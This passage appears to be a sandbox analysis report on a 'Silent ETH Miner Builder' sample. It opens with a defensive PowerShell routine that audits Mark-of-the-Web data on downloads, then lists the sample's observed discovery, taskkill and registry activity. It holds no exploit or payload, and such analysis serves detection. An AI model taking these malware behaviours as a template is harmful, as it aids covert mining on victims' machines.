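    $hostUrl = if ($raw -match '(?m)^HostUrl=([^\r\n]+)')     { $Matches[1] }      else { $null }
    $refUrl  = if ($raw -match '(?m)^ReferrerUrl=([^\r\n]+)') { $Matches[1] }      else { $null }
    $verdict = if ($null -eq $zone) { 'MALFORMED' }            # stream exists but no ZoneId line
               elseif ($zone -ge 3) { 'INTERNET_OR_RESTRICTED' } # 3 = Internet, 4 = Restricted: SmartScreen and Protected View apply
               else { 'LOW_ZONE' }                             # 0-2 = Local/Intranet/Trusted, unexpected for a browser download
    [pscustomobject]@{
        File = $Path; HasMotw = $true; ZoneId = $zone
        HostUrl = $hostUrl; ReferrerUrl = $refUrl; Verdict = $verdict
    }
}

function Get-MotwAudit {
    # Apply Get-MotwInfo to every file in a folder with an extension worth checking.
    param(
        [string]$Folder = "$env:USERPROFILE\Downloads",
        [string[]]$Extensions = @('.exe', '.dll', '.msi', '.scr', '.js', '.vbs', '.rar', '.zip', '.7z')
    )
    Get-ChildItem -LiteralPath $Folder -File |
        Where-Object { $_.Extension -in $Extensions } |
        ForEach-Object { Get-MotwInfo -Path $_.FullName }
}

# Usage: the Downloads folder and one of the files named in the report rows.
Get-MotwAudit -Folder 'C:\Users\Admin\Downloads' | Format-Table -AutoSize
Get-MotwInfo -Path 'C:\Users\Admin\Downloads\TaskManager Installer.exe'
```

A browser download that still carries ZoneId=3 with a HostUrl means the mark was applied and kept; NO_MOTW on a file the browser demonstrably wrote is the case worth pulling the file for, since the archive handler or the sample itself may have removed the stream after the browser set it.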

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133865464186428444" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 50003100000000006d5a028b100041646d696e003c0009000400efbe6d5a76846f5a4da72e00000021570200000001000000000000000000000000000000c9a0bf00410064006d0069006e00000014000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\BackgroundTransferHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 50003100000000006d5aa38610004c6f63616c003c0009000400efbe6d5a76846f5a4da72e00000040570200000001000000000000000000000000000000727b8d004c006f00630061006c00000014000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202020202 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0 = 60003100000000006f5a4fa71000375a4f3435347e320000480009000400efbe6f5a4fa76f5a4fa72e00000040b2020000001a000000000000000000000000000000493c2f0137007a004f0034003500340043003400390039003800000018000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Children C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4e003100000000006f5a4fa7100054656d7000003a0009000400efbe6d5a76846f5a4fa72e00000041570200000001000000000000000000000000000000493c2f01540065006d007000000014000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000007000000060000000500000004000000020000000300000001000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\DisplayName = "Chrome Sandbox" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-167299615-4170584903-1843289874-1000\{6E742B4A-2A0C-44B9-B4F1-C19D2A5F5D52} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 78003100000000006d5a76841100557365727300640009000400efbec5522d606f5a4da72e0000006c0500000000010000000000000000003a00000000003e5e3d0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
